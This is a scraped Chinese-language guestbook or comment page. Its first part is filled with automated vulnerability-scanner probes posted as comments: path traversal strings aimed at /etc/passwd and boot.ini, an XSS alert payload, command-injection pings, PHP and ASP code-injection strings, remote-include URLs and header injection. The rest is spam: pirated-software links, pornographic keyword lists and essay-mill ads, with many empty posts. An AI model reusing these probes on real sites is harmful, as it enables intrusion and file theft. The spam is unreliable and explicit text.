88888 發表于 - 2017-04-24 03:09:42
88888 :
88888" 發表于 - 2017-04-24 03:09:56
88888 :
88888JyI= 發表于 - 2017-04-24 03:10:06
88888 :
88888 發表于 - 2017-04-24 03:10:11
88888" :
88888 發表于 - 2017-04-24 03:10:12
88888 :
88888 發表于 - 2017-04-24 03:10:21
88888JyI= :
88888 發表于 - 2017-04-24 03:10:22
88888 :
88888e360 發表于 - 2017-04-24 03:10:36
88888 :
888886633x3X6 發表于 - 2017-04-24 03:10:46
88888 :
88888 發表于 - 2017-04-24 03:10:52
88888e360 :
88888 發表于 - 2017-04-24 03:10:53
88888 :
88888 發表于 - 2017-04-24 03:11:02
888886633x3X6 :
88888 發表于 - 2017-04-24 03:11:03
88888 :
88888[] 發表于 - 2017-04-24 03:11:16
88888 :
發表于 - 2017-04-24 03:11:26
88888 :
88888 發表于 - 2017-04-24 03:11:32
88888[] :
88888 發表于 - 2017-04-24 03:11:33
88888 :
88888 發表于 - 2017-04-24 03:11:42
88888 發表于 - 2017-04-24 03:11:43
88888 :
88888/ 發表于 - 2017-04-24 03:11:46
88888 :
88888) 發表于 - 2017-04-24 03:11:57
88888 :
88888 發表于 - 2017-04-24 03:12:03
88888/ :
88888 發表于 - 2017-04-24 03:12:03
88888 :
88888!(() 發表于 - 2017-04-24 03:12:07
88888) :
88888 發表于 - 2017-04-24 03:12:12
88888 :
88888 發表于 - 2017-04-24 03:12:13
88888 :
88888alert(42873) 發表于 - 2017-04-24 03:12:17
88888!(() :
88888 發表于 - 2017-04-24 03:12:22
88888 :
88888 發表于 - 2017-04-24 03:12:23
88888 :
../../../../../../../../boot.ini 發表于 - 2017-04-24 03:12:28
88888alert(42873) :
88888 發表于 - 2017-04-24 03:12:32
88888 :
88888 發表于 - 2017-04-24 03:12:33
88888 :
../../../../../../../../boot.ini 發表于 - 2017-04-24 03:12:39
../../../../../../../../boot.ini :
88888 發表于 - 2017-04-24 03:12:42
88888 :
88888 發表于 - 2017-04-24 03:12:43
88888 :
發表于 - 2017-04-24 03:12:49
../../../../../../../../boot.ini :
88888 發表于 - 2017-04-24 03:12:52
88888 :
88888 發表于 - 2017-04-24 03:12:54
88888 :
../../../../../../../../boot.ini.jpg 發表于 - 2017-04-24 03:12:59
88888 發表于 - 2017-04-24 03:13:02
88888 :
88888 發表于 - 2017-04-24 03:13:04
88888 :
../../../../../../../../boot.ini.html 發表于 - 2017-04-24 03:13:10
../../../../../../../../boot.ini.jpg :
88888 發表于 - 2017-04-24 03:13:13
88888 :
88888 發表于 - 2017-04-24 03:13:15
88888 :
/.\./.\./.\./.\./.\./.\./boot.ini 發表于 - 2017-04-24 03:13:21
../../../../../../../../boot.ini.html :
88888 發表于 - 2017-04-24 03:13:24
88888 :
88888 發表于 - 2017-04-24 03:13:25
88888 :
C:oot.ini 發表于 - 2017-04-24 03:13:32
88888 :
88888 發表于 - 2017-04-24 03:13:35
/.\./.\./.\./.\./.\./.\./boot.ini :
88888 發表于 - 2017-04-24 03:13:35
88888 :
................oot.ini 發表于 - 2017-04-24 03:13:42
C:oot.ini :
88888 發表于 - 2017-04-24 03:13:45
88888 :
88888 發表于 - 2017-04-24 03:13:45
88888 :
../..//../..//../..//../..//../..//../..//../..//../..//boot.ini 發表于 - 2017-04-24 03:13:52
88888 :
88888 發表于 - 2017-04-24 03:13:55
................oot.ini :
88888 發表于 - 2017-04-24 03:13:55
88888 :
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini 發表于 - 2017-04-24 03:14:02
../..//../..//../..//../..//../..//../..//../..//../..//boot.ini :
88888 發表于 - 2017-04-24 03:14:05
88888 :
88888 發表于 - 2017-04-24 03:14:06
88888 :
發表于 - 2017-04-24 03:14:13
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini :
88888 發表于 - 2017-04-24 03:14:15
88888 :
88888 發表于 - 2017-04-24 03:14:17
88888 :
<................oot.ini 發表于 - 2017-04-24 03:14:23
88888 發表于 - 2017-04-24 03:14:25
88888 :
88888 發表于 - 2017-04-24 03:14:27
88888 :
|................oot.ini 發表于 - 2017-04-24 03:14:33
<................oot.ini :
88888 發表于 - 2017-04-24 03:14:35
88888 :
88888 發表于 - 2017-04-24 03:14:37
88888 :
../../../../../../../../boot.ini.htm 發表于 - 2017-04-24 03:14:43
|................oot.ini :
88888 發表于 - 2017-04-24 03:14:45
88888 :
88888 發表于 - 2017-04-24 03:14:47
88888 :
../../../../../../../../boot.ini.txt 發表于 - 2017-04-24 03:14:53
../../../../../../../../boot.ini.htm :
88888 發表于 - 2017-04-24 03:14:56
88888 :
88888 發表于 - 2017-04-24 03:14:57
88888 :
file:///c:/boot.ini 發表于 - 2017-04-24 03:15:03
../../../../../../../../boot.ini.txt :
88888 發表于 - 2017-04-24 03:15:06
88888 :
88888 發表于 - 2017-04-24 03:15:07
88888 :
................windowswin.ini 發表于 - 2017-04-24 03:15:13
file:///c:/boot.ini :
88888 發表于 - 2017-04-24 03:15:17
88888 :
88888 發表于 - 2017-04-24 03:15:17
88888 :
../../../../../../../../etc/passwd 發表于 - 2017-04-24 03:15:24
................windowswin.ini :
88888 發表于 - 2017-04-24 03:15:27
88888 :
88888 發表于 - 2017-04-24 03:15:28
88888 :
../../../../../../../../etc/passwd 發表于 - 2017-04-24 03:15:35
../../../../../../../../etc/passwd :
88888 發表于 - 2017-04-24 03:15:37
88888 :
88888 發表于 - 2017-04-24 03:15:39
88888 :
../../../../../../../../etc/passwd 發表于 - 2017-04-24 03:15:46
../../../../../../../../etc/passwd :
88888 發表于 - 2017-04-24 03:15:47
88888 :
88888 發表于 - 2017-04-24 03:15:49
88888 :
../../../../../../../../etc/passwd.html 發表于 - 2017-04-24 03:15:56
../../../../../../../../etc/passwd :
88888 發表于 - 2017-04-24 03:15:58
88888 :
88888 發表于 - 2017-04-24 03:15:59
88888 :
../../../../../../../../etc/passwd.jpg 發表于 - 2017-04-24 03:16:06
../../../../../../../../etc/passwd.html :
88888 發表于 - 2017-04-24 03:16:08
88888 :
88888 發表于 - 2017-04-24 03:16:10
88888 :
.\./.\./.\./.\./.\./.\./etc/passwd 發表于 - 2017-04-24 03:16:16
../../../../../../../../etc/passwd.jpg :
88888 發表于 - 2017-04-24 03:16:18
88888 :
88888 發表于 - 2017-04-24 03:16:20
88888 :
/etc/passwd 發表于 - 2017-04-24 03:16:26
.\./.\./.\./.\./.\./.\./etc/passwd :
88888 發表于 - 2017-04-24 03:16:29
88888 :
88888 發表于 - 2017-04-24 03:16:31
88888 :
/./././././././etc/passwd 發表于 - 2017-04-24 03:16:36
/etc/passwd :
88888 發表于 - 2017-04-24 03:16:40
88888 :
88888 發表于 - 2017-04-24 03:16:41
88888 :
................etc/passwd 發表于 - 2017-04-24 03:16:46
/./././././././etc/passwd :
88888 發表于 - 2017-04-24 03:16:50
88888 :
88888 發表于 - 2017-04-24 03:16:52
88888 :
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd 發表于 - 2017-04-24 03:16:57
................etc/passwd :
88888 發表于 - 2017-04-24 03:17:01
88888 :
88888 發表于 - 2017-04-24 03:17:02
88888 :
發表于 - 2017-04-24 03:17:07
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd :
88888 發表于 - 2017-04-24 03:17:11
88888 :
88888 發表于 - 2017-04-24 03:17:12
88888 :
<../../../../../../../../etc/passwd 發表于 - 2017-04-24 03:17:17
88888 發表于 - 2017-04-24 03:17:21
88888 :
88888 發表于 - 2017-04-24 03:17:23
88888 :
|../../../../../../../../etc/passwd 發表于 - 2017-04-24 03:17:28
<../../../../../../../../etc/passwd :
88888 發表于 - 2017-04-24 03:17:31
88888 :
88888 發表于 - 2017-04-24 03:17:33
88888 :
發表于 - 2017-04-24 03:17:38
|../../../../../../../../etc/passwd :
88888 發表于 - 2017-04-24 03:17:41
88888 :
88888 發表于 - 2017-04-24 03:17:44
88888 :
file:///etc/passwd 發表于 - 2017-04-24 03:17:50
88888 發表于 - 2017-04-24 03:17:53
88888 :
88888 發表于 - 2017-04-24 03:17:55
88888 :
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd 發表于 - 2017-04-24 03:18:00
file:///etc/passwd :
88888 發表于 - 2017-04-24 03:18:03
88888 :
88888 發表于 - 2017-04-24 03:18:05
88888 :
../../../../../../../../../../etc/passwd 發表于 - 2017-04-24 03:18:10
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd :
88888 發表于 - 2017-04-24 03:18:12
88888 :
88888 發表于 - 2017-04-24 03:18:15
88888 :
../../../../../../../../../../etc/passwd 發表于 - 2017-04-24 03:18:19
../../../../../../../../../../etc/passwd :
88888 發表于 - 2017-04-24 03:18:21
88888 :
88888 發表于 - 2017-04-24 03:18:24
88888 :
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd 發表于 - 2017-04-24 03:18:28
../../../../../../../../../../etc/passwd :
88888 發表于 - 2017-04-24 03:18:30
88888 :
88888 發表于 - 2017-04-24 03:18:33
88888 :
.../.../.../.../.../.../.../.../etc/passwd 發表于 - 2017-04-24 03:18:37
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd :
88888 發表于 - 2017-04-24 03:18:39
88888 :
88888 發表于 - 2017-04-24 03:18:42
88888 :
................/etc/passwd 發表于 - 2017-04-24 03:18:46
.../.../.../.../.../.../.../.../etc/passwd :
88888 發表于 - 2017-04-24 03:18:48
88888 :
88888 發表于 - 2017-04-24 03:18:51
88888 :
................etc/passwd 發表于 - 2017-04-24 03:18:55
................/etc/passwd :
88888 發表于 - 2017-04-24 03:18:57
88888 :
88888 發表于 - 2017-04-24 03:19:00
88888 :
發表于 - 2017-04-24 03:19:04
................etc/passwd :
88888 發表于 - 2017-04-24 03:19:06
88888 :
88888 發表于 - 2017-04-24 03:19:09
88888 :
../../../../../../../../etc/passwd 發表于 - 2017-04-24 03:19:14
88888 發表于 - 2017-04-24 03:19:16
88888 :
88888 發表于 - 2017-04-24 03:19:19
88888 :
../../../../../../../../etc/passwd 發表于 - 2017-04-24 03:19:23
../../../../../../../../etc/passwd :
88888 發表于 - 2017-04-24 03:19:25
88888 :
88888 發表于 - 2017-04-24 03:19:28
88888 :
................etc/passwd 發表于 - 2017-04-24 03:19:32
../../../../../../../../etc/passwd :
88888 發表于 - 2017-04-24 03:19:34
88888 :
88888 發表于 - 2017-04-24 03:19:37
88888 :
http://some-inexistent-website.com/some_inexistent_file_with_long_name 發表于 - 2017-04-24 03:19:41
................etc/passwd :
88888 發表于 - 2017-04-24 03:19:43
88888 :
88888 發表于 - 2017-04-24 03:19:46
88888 :
/some_inexistent_file_with_long_name 發表于 - 2017-04-24 03:19:50
http://some-inexistent-website.com/some_inexistent_file_with_long_name :
88888 發表于 - 2017-04-24 03:19:52
88888 :
88888 發表于 - 2017-04-24 03:19:55
88888 :
SomeCustomInjectedHeader:injected_by_test 發表于 - 2017-04-24 03:19:59
/some_inexistent_file_with_long_name :
88888 發表于 - 2017-04-24 03:20:01
88888 :
88888 發表于 - 2017-04-24 03:20:04
88888 :
SomeCustomInjectedHeader:injected_by_test 發表于 - 2017-04-24 03:20:08
SomeCustomInjectedHeader:injected_by_test :
88888 發表于 - 2017-04-24 03:20:10
88888 :
88888 發表于 - 2017-04-24 03:20:13
88888 :
SomeCustomInjectedHeader:injected_by_test 發表于 - 2017-04-24 03:20:17
SomeCustomInjectedHeader:injected_by_test :
88888 發表于 - 2017-04-24 03:20:19
88888 :
88888 發表于 - 2017-04-24 03:20:22
88888 :
dir 發表于 - 2017-04-24 03:20:26
SomeCustomInjectedHeader:injected_by_test :
88888 發表于 - 2017-04-24 03:20:29
88888 :
88888 發表于 - 2017-04-24 03:20:32
88888 :
<dir 發表于 - 2017-04-24 03:20:35
dir :
88888 發表于 - 2017-04-24 03:20:38
88888 :
88888 發表于 - 2017-04-24 03:20:41
88888 :
http://oxoxoxoxoxoxox.com 發表于 - 2017-04-24 03:20:44
<dir :
88888 發表于 - 2017-04-24 03:20:47
88888 :
88888 發表于 - 2017-04-24 03:20:50
88888 :
oxoxoxoxoxoxox.com 發表于 - 2017-04-24 03:20:53
http://oxoxoxoxoxoxox.com :
88888 發表于 - 2017-04-24 03:20:55
88888 :
88888 發表于 - 2017-04-24 03:20:58
oxoxoxoxoxoxox.com :
88888 發表于 - 2017-04-24 03:21:03
88888 :
88888 發表于 - 2017-04-24 03:21:06
88888 :
${@print(md5(1122))} 發表于 - 2017-04-24 03:21:22
${@print(md5(1122))} :
88888 發表于 - 2017-04-24 03:21:33
88888 :
88888 發表于 - 2017-04-24 03:21:36
88888 :
phpinfo 發表于 - 2017-04-24 03:21:38
phpinfo :
88888 發表于 - 2017-04-24 03:21:47
88888 :
88888 發表于 - 2017-04-24 03:21:51
88888 :
http://hitBAo6EKQnyr.bxss.me/ 發表于 - 2017-04-24 03:22:25
88888 :
http://hitd0rQGQge8t.bxss.me/ 發表于 - 2017-04-24 03:22:32
http://hitBAo6EKQnyr.bxss.me/ :
88888 發表于 - 2017-04-24 03:22:34
88888 :
88888 發表于 - 2017-04-24 03:22:38
88888 :
http://testasp.vulnweb.com/t/fit.txt 發表于 - 2017-04-24 03:22:40
http://hitd0rQGQge8t.bxss.me/ :
88888 發表于 - 2017-04-24 03:22:41
88888 :
88888 發表于 - 2017-04-24 03:22:43
88888 :
set|set 發表于 - 2017-04-24 03:22:45
http://testasp.vulnweb.com/t/fit.txt :
88888 發表于 - 2017-04-24 03:22:47
88888 :
88888 發表于 - 2017-04-24 03:22:48
set|set :
88888 發表于 - 2017-04-24 03:22:51
88888 :
88888 發表于 - 2017-04-24 03:22:52
88888 :
`ping -c 5 127.0.0.1` 發表于 - 2017-04-24 03:22:54
88888 :
|ping -n 5 127.0.0.1| 發表于 - 2017-04-24 03:22:59
`ping -c 5 127.0.0.1` :
88888 發表于 - 2017-04-24 03:23:00
88888 :
88888 發表于 - 2017-04-24 03:23:01
88888 :
|ping -c 4 127.0.0.1 發表于 - 2017-04-24 03:23:03
|ping -n 5 127.0.0.1| :
88888 發表于 - 2017-04-24 03:23:04
88888 :
88888 發表于 - 2017-04-24 03:23:05
88888 :
response.write(9412458*9542755) 發表于 - 2017-04-24 03:23:07
|ping -c 4 127.0.0.1 :
88888 發表于 - 2017-04-24 03:23:08
88888 :
88888 發表于 - 2017-04-24 03:23:09
88888 :
http://webscan.# 發表于 - 2017-04-24 03:23:11
response.write(9412458*9542755) :
88888 發表于 - 2017-04-24 03:23:12
88888 :
88888 發表于 - 2017-04-24 03:23:14
88888 :
${87654321-12345678} 發表于 - 2017-04-24 03:23:15
http://webscan.# :
88888 發表于 - 2017-04-24 03:23:17
88888 :
88888 發表于 - 2017-04-24 03:23:18
88888 :
發表于 - 2017-04-24 03:23:20
${87654321-12345678} :
88888 發表于 - 2017-04-24 03:23:21
88888 :
88888 發表于 - 2017-04-24 03:23:22
88888 發表于 - 2017-04-24 03:23:24
88888 :
88888 發表于 - 2017-04-24 03:23:26
發表于 - 2017-04-25 00:08:31
發表于 - 2017-04-25 00:08:40
發表于 - 2017-04-25 00:08:41
發表于 - 2017-04-25 00:51:28
發表于 - 2017-04-25 06:23:58
發表于 - 2017-04-29 14:56:04
發表于 - 2017-04-30 04:48:30
Eugenekes :
<a href=http://guod.me/sq/kapsula-revomuscle-per-rritjen-e-muskujve-shqyrtim-i-vertete.html>http://guod.me/sq/kapsula-revomuscle-per-rritjen-e-muskujve-shqyrtim-i-vertete.html</a> 發表于 - 2017-04-30 04:49:30
發表于 - 2017-05-01 05:16:21
發表于 - 2017-05-01 20:22:46
發表于 - 2017-05-02 21:03:47
發表于 - 2017-05-03 09:28:34
發表于 - 2017-05-04 14:47:57
發表于 - 2017-05-05 21:19:13
發表于 - 2017-05-07 11:09:48
發表于 - 2017-05-09 08:53:37
發表于 - 2017-05-10 05:45:39
發表于 - 2017-05-10 10:37:46
發表于 - 2017-05-10 10:38:12
發表于 - 2017-05-10 12:05:59
發表于 - 2017-05-11 16:24:27
發表于 - 2017-05-12 10:43:47
發表于 - 2017-05-13 11:06:33
發表于 - 2017-05-14 05:11:49
發表于 - 2017-05-14 17:44:43
發表于 - 2017-05-14 22:09:04
發表于 - 2017-05-15 16:40:35
發表于 - 2017-05-17 09:25:53
發表于 - 2017-05-18 18:12:40
發表于 - 2017-05-18 18:14:06
發表于 - 2017-05-18 19:46:06
發表于 - 2017-05-21 10:32:32
發表于 - 2017-05-22 20:36:15
發表于 - 2017-05-23 13:18:17
發表于 - 2017-05-23 17:08:58
發表于 - 2017-05-24 00:30:53
發表于 - 2017-05-24 00:34:44
發表于 - 2017-05-24 00:38:30
發表于 - 2017-05-24 00:42:09
發表于 - 2017-05-24 00:45:40
發表于 - 2017-05-24 00:49:16
發表于 - 2017-05-24 00:53:00
發表于 - 2017-05-24 00:56:49
發表于 - 2017-05-24 01:00:50
發表于 - 2017-05-24 01:04:35
發表于 - 2017-05-24 01:08:20
發表于 - 2017-05-24 01:11:52
發表于 - 2017-05-24 01:15:38
發表于 - 2017-05-24 01:19:13
發表于 - 2017-05-24 01:22:48
發表于 - 2017-05-24 01:26:22
發表于 - 2017-05-24 01:30:08
發表于 - 2017-05-24 01:33:53
發表于 - 2017-05-24 01:38:11
發表于 - 2017-05-24 01:41:47
發表于 - 2017-05-24 01:45:32
發表于 - 2017-05-24 01:49:07
發表于 - 2017-05-24 01:53:02
發表于 - 2017-05-24 01:56:50
發表于 - 2017-05-24 02:00:26
發表于 - 2017-05-24 02:04:04
發表于 - 2017-05-24 02:07:39
發表于 - 2017-05-24 02:11:16
發表于 - 2017-05-24 02:15:01
發表于 - 2017-05-24 02:18:37
發表于 - 2017-05-24 02:22:12
發表于 - 2017-05-24 02:25:40
發表于 - 2017-05-24 02:29:15
發表于 - 2017-05-25 05:50:15
發表于 - 2017-05-25 07:48:02
發表于 - 2017-05-29 07:13:40
發表于 - 2017-05-29 08:21:23
發表于 - 2017-05-30 05:23:00
發表于 - 2017-05-30 07:27:27
發表于 - 2017-05-30 20:34:25
發表于 - 2017-05-30 22:09:48
發表于 - 2017-06-01 20:36:27
發表于 - 2017-06-01 21:42:12
發表于 - 2017-06-02 16:40:16
發表于 - 2017-06-02 17:59:43
發表于 - 2017-06-03 22:28:34
發表于 - 2017-06-04 06:30:14
發表于 - 2017-06-04 06:33:36
發表于 - 2017-06-04 06:37:33
發表于 - 2017-06-04 06:43:25
發表于 - 2017-06-04 06:57:46
發表于 - 2017-06-04 07:08:30
發表于 - 2017-06-04 07:23:53
發表于 - 2017-06-04 07:32:42
發表于 - 2017-06-04 07:41:02
發表于 - 2017-06-04 07:53:32
發表于 - 2017-06-04 08:09:31
發表于 - 2017-06-04 08:11:43
發表于 - 2017-06-04 08:18:52
發表于 - 2017-06-04 08:26:27
發表于 - 2017-06-04 13:05:00
發表于 - 2017-06-04 21:23:06
purchaseadobepremiere :
buy <a href="https://gigasoft.us/product/adobe_creative_suite_3_web_premium/">Adobe Creative Suite</a> discount <a href="https://gigasoft.us/product/adobe_creative_suite_3_master_collection/">Adobe Creative Suite</a> buy <a href="https://gigasoft.us/product/adobe_after_effects_cs3_professional/">Adobe After Effects </a> 發表于 - 2017-06-04 21:23:08
發表于 - 2017-06-05 00:12:41
buyadobepremiere :
{buy |purchase |cheapest price |}<a href="https://gigasoft.us/product/adobe-captivate-8/">adobe captivate 8</a>{| discount| online} {buy |purchase |cheapest price |}<a href="https://gigasoft.us/product/adobe_acrobat_9_pro_extended/">{buy Adobe Acrobat 9</a>{| discount| online} {buy |purchase |cheapest price |}<a href="https://gigasoft.us/product/adobe_creative_suite_3_web_premium/">Adobe Creative Suite</a>{| discount| online} 發表于 - 2017-06-05 00:12:46
發表于 - 2017-06-05 02:37:08
buyadobepremiere :
{buy |purchase |cheapest price |}<a href="https://gigasoft.us/product/sony_cd_architect_5_2/">Sony CD Architect</a>{| discount| online} {buy |purchase |cheapest price |}<a href="https://gigasoft.us/product/adobe_acrobat_9_pro_extended/">{buy Adobe Acrobat 9</a>{| discount| online} {buy |purchase |cheapest price |}<a href="https://gigasoft.us/product/adobe-captivate-8/">adobe captivate 8</a>{| discount| online} 發表于 - 2017-06-05 02:37:10
發表于 - 2017-06-06 06:23:01
發表于 - 2017-06-06 07:20:00
Robertskica :
http://cellspy.us/ - Buy Discount Software 發表于 - 2017-06-06 07:20:02
發表于 - 2017-06-06 20:33:25
發表于 - 2017-06-07 01:27:56
發表于 - 2017-06-10 17:37:21
發表于 - 2017-06-11 21:03:12
發表于 - 2017-06-14 01:56:25
發表于 - 2017-06-14 13:26:54
發表于 - 2017-06-15 00:33:16
發表于 - 2017-06-15 16:03:09
發表于 - 2017-06-16 07:31:58
發表于 - 2017-06-17 11:26:19
發表于 - 2017-06-18 13:12:53
發表于 - 2017-06-19 16:49:14
發表于 - 2017-06-21 00:47:51
發表于 - 2017-06-24 02:13:26
Michaelfoody :
porno casero videos taboo porno porno iran video porno de mexico porno freedownload <a href="http://blackwebcam.us/">webcam girls</a> horse porno video porno de miley cyrus porno 3 xxx video porno 18 porno free ass porno fucking videos porno indonesia porno incesto porno live maribel guardia porno <a href="http://blackwebcam.us/">real life cam</a> fre gay porno porno bbw porno free sex shakira porno teens sex porno 發表于 - 2017-06-24 02:13:28
發表于 - 2017-06-24 02:13:30
發表于 - 2017-06-24 02:13:35
發表于 - 2017-06-24 02:45:48
發表于 - 2017-06-24 09:51:04
Michaelfoody :
porno move muscle porno gay mamacitas porno gays porno porno salvador <a href="http://blackwebcam.us/">teen cam</a> porno x com porno movies for women siti porno porno colonbianas porno llora tila tequila porno porno de belinda best teen porno baixar video porno porno old womens <a href="http://blackwebcam.us/">real life cam</a> ninel conde video porno porno sexmex porno gordas teen porno videos free porno italiana 發表于 - 2017-06-24 09:51:06
發表于 - 2017-06-24 09:51:08
發表于 - 2017-06-24 09:51:13
發表于 - 2017-06-24 18:11:58
發表于 - 2017-06-24 18:12:02
發表于 - 2017-06-24 18:12:10
發表于 - 2017-06-25 01:58:35
發表于 - 2017-06-25 01:58:38
發表于 - 2017-06-25 01:58:41
發表于 - 2017-06-25 09:24:50
發表于 - 2017-06-25 20:55:23
發表于 - 2017-06-25 20:55:27
發表于 - 2017-06-25 20:55:35
發表于 - 2017-06-26 04:42:44
發表于 - 2017-06-26 04:42:46
發表于 - 2017-06-26 04:42:48
發表于 - 2017-06-26 13:20:10
發表于 - 2017-06-26 13:20:16
發表于 - 2017-06-26 13:20:22
發表于 - 2017-06-27 04:35:41
發表于 - 2017-06-27 04:35:44
發表于 - 2017-06-27 04:35:46
發表于 - 2017-06-27 19:55:55
發表于 - 2017-06-27 19:55:58
發表于 - 2017-06-27 19:56:02
發表于 - 2017-06-28 18:34:53
發表于 - 2017-06-28 18:34:57
發表于 - 2017-06-28 18:34:59
發表于 - 2017-06-29 01:55:31
發表于 - 2017-06-29 21:27:56
發表于 - 2017-06-30 17:09:39
發表于 - 2017-06-30 21:02:00
發表于 - 2017-07-01 07:32:06
發表于 - 2017-07-02 02:29:33
發表于 - 2017-07-03 19:49:09
發表于 - 2017-07-05 04:33:38
發表于 - 2017-07-05 13:57:51
發表于 - 2017-07-06 16:46:26
發表于 - 2017-07-07 01:54:45
發表于 - 2017-07-07 18:11:22
發表于 - 2017-07-08 03:49:47
發表于 - 2017-07-08 18:43:17
發表于 - 2017-07-08 19:58:20
發表于 - 2017-07-08 23:56:13
發表于 - 2017-07-09 01:20:34
發表于 - 2017-07-09 04:30:21
發表于 - 2017-07-09 05:41:16
發表于 - 2017-07-09 07:58:30
發表于 - 2017-07-09 09:27:56
發表于 - 2017-07-09 12:00:48
發表于 - 2017-07-09 13:17:01
發表于 - 2017-07-09 16:42:00
發表于 - 2017-07-09 18:57:51
發表于 - 2017-07-09 22:19:00
發表于 - 2017-07-09 23:38:42
發表于 - 2017-07-10 03:42:28
發表于 - 2017-07-10 08:33:16
發表于 - 2017-07-10 10:55:56
發表于 - 2017-07-10 10:59:01
發表于 - 2017-07-10 11:07:11
發表于 - 2017-07-10 11:58:52
發表于 - 2017-07-10 15:04:27
發表于 - 2017-07-10 16:56:35
發表于 - 2017-07-10 18:09:14
發表于 - 2017-07-10 22:47:17
發表于 - 2017-07-11 00:49:04
發表于 - 2017-07-11 02:03:39
發表于 - 2017-07-11 04:15:42
發表于 - 2017-07-11 06:55:30
發表于 - 2017-07-11 08:57:21
發表于 - 2017-07-11 10:09:12
發表于 - 2017-07-11 13:01:09
發表于 - 2017-07-11 15:57:44
發表于 - 2017-07-11 19:07:27
發表于 - 2017-07-11 21:09:41
發表于 - 2017-07-12 01:41:02
TimothySeisp :
distributed generation literature review <a href="http://www.buyessayuk.us">Article Review</a> custom dissertation writing essay do you bring a cover letter to an interview essay about national service training program 發表于 - 2017-07-12 01:41:05
發表于 - 2017-07-12 05:45:27
TimothySeisp :
degree essay writing <a href="http://www.buyessayuk.us">College Essay</a> research paper on anxiety disorder narrative essay love hurts masters research thesis 發表于 - 2017-07-12 05:45:29
發表于 - 2017-07-12 07:54:34
TimothySeisp :
buy online essay 10$ page <a href="http://www.buyessayuk.us">essay examples</a> dissertation article paper on police brutality university of arizona application essay 發表于 - 2017-07-12 07:54:36
發表于 - 2017-07-12 11:07:27
發表于 - 2017-07-12 16:28:14
TimothySeisp :
need to buy a annotated bibliography <a href="http://www.buyessayuk.us">essays</a> dissertation projects for mba finance what is essay writing service how to make an introduction for an essay 發表于 - 2017-07-12 16:28:16
發表于 - 2017-07-12 19:00:22
發表于 - 2017-07-12 22:20:38
TimothySeisp :
dissertation emploi chomage <a href="http://www.buyessayuk.us">Essay Writer</a> custom research paper service carl friedrich gauss dissertation research paper on wuthering heights 發表于 - 2017-07-12 22:20:40
發表于 - 2017-07-13 05:49:39
發表于 - 2017-07-13 12:13:54
發表于 - 2017-07-13 22:02:49
TimothySeisp :
conclusion on global warming essay Argument Essay http://www.buyessayuk.us doctoral dissertation"" assistance persuasive essay on euthanasia buy dissertations 發表于 - 2017-07-13 22:02:51
發表于 - 2017-07-14 13:37:31
TimothySeisp :
the outsiders essay Buy Essays http://www.buyessayuk.us how to start my college admission essay phd thesis in finance management boston college dissertation fellowship 發表于 - 2017-07-14 13:37:33
發表于 - 2017-07-14 14:47:18
發表于 - 2017-07-14 20:41:14
發表于 - 2017-07-14 20:41:46
發表于 - 2017-07-14 20:42:20
發表于 - 2017-07-14 22:49:15
TimothySeisp :
write essays argumentative essay http://www.buyessayuk.us university essay help toronto best dissertation writers in the world buy mba research 發表于 - 2017-07-14 22:49:17
發表于 - 2017-07-15 20:18:41
TimothySeisp :
dissertation writing nyc events <a href="http://www.buyessayuk.us">Academic Writing</a> how to start a college admissions essay 100 word term paper writing service essay helper services 發表于 - 2017-07-15 20:18:43
發表于 - 2017-07-16 00:07:00
發表于 - 2017-07-16 03:24:00
TimothySeisp :
writing a dissertation kingston university Article Rewriter http://www.buyessayuk.us essay help to kill a mockingbird master thesis computer science archive an essay about helping the homeless 發表于 - 2017-07-16 03:24:06
發表于 - 2017-07-16 15:52:59
發表于 - 2017-07-16 16:28:13
TimothySeisp :
phd thesis table of contents template <a href="http://www.buyessayuk.us">Essay Template</a> the stranger essays essay on life without water eassay on the birthmark 發表于 - 2017-07-16 16:28:15
發表于 - 2017-07-17 01:17:57
發表于 - 2017-07-17 05:37:44
發表于 - 2017-07-17 07:32:44
TimothySeisp :
how do i view my sat essay online <a href="http://www.buyessayuk.us">Argumentative Essay</a> comment faire une dissertation en ses master thesis mba write essay for me best site 發表于 - 2017-07-17 07:32:46
發表于 - 2017-07-17 09:42:17
發表于 - 2017-07-17 13:35:51
TimothySeisp :
best architecture dissertations essay writer http://www.buyessayuk.us digital dissertation proquest legitimate custom writing services admission essay editing service english 發表于 - 2017-07-17 13:35:54
發表于 - 2017-07-17 16:15:10
發表于 - 2017-07-17 18:26:53
發表于 - 2017-07-17 20:21:04
TimothySeisp :
dissertation editors south africa <a href="http://www.buyessayuk.us">Article Review</a> evaluation report of phd thesis mr smith goes to washington essay write my own paper 發表于 - 2017-07-17 20:21:14
發表于 - 2017-07-17 22:33:45
TimothySeisp :
doctoral dissertation writing help websites <a href="http://www.buyessayuk.us">Argument Essay</a> master thesis lyx layout best online resume writing service london three essays on the theory of sexuality 發表于 - 2017-07-17 22:33:48
發表于 - 2017-07-17 23:59:49
TimothySeisp :
essay writing upsr <a href="http://www.buyessayuk.us">Writing Services</a> the picture of dorian gray essay constitutional law dissertation topics dissertation vs thesis uk 發表于 - 2017-07-17 23:59:52
發表于 - 2017-07-18 02:39:41
發表于 - 2017-07-18 03:55:06
TimothySeisp :
research papers sites <a href="http://www.buyessayuk.us">how to write an essay</a> how to end a persuasive essay distribution of business plan failed phd thesis 發表于 - 2017-07-18 03:55:08
發表于 - 2017-07-18 05:50:55
TimothySeisp :
college essay starters <a href="http://www.buyessayuk.us">Best Custom Writing</a> analytical components of a qualitative dissertation custom paper point writing content for a website 發表于 - 2017-07-18 05:50:58
發表于 - 2017-07-18 07:07:22
發表于 - 2017-07-18 09:43:37
TimothySeisp :
satellite communications research paper Academic Writing http://www.buyessayuk.us dissertation virginia polytechnic institute write article do the write thing essay 2008 2009 發表于 - 2017-07-18 09:43:39
發表于 - 2017-07-18 10:57:53
TimothySeisp :
my assignment expert <a href="http://www.buyessayuk.us">essay outline</a> masters english thesis examples personal essay undergraduate admission writing dissertation on ipad 發表于 - 2017-07-18 10:57:56
發表于 - 2017-07-18 14:14:25
TimothySeisp :
how to write an essay about love <a href="http://www.buyessayuk.us">essay examples</a> college application essay rubric board synthesis dissertation electronic commerce doctor cover letter job 發表于 - 2017-07-18 14:14:31
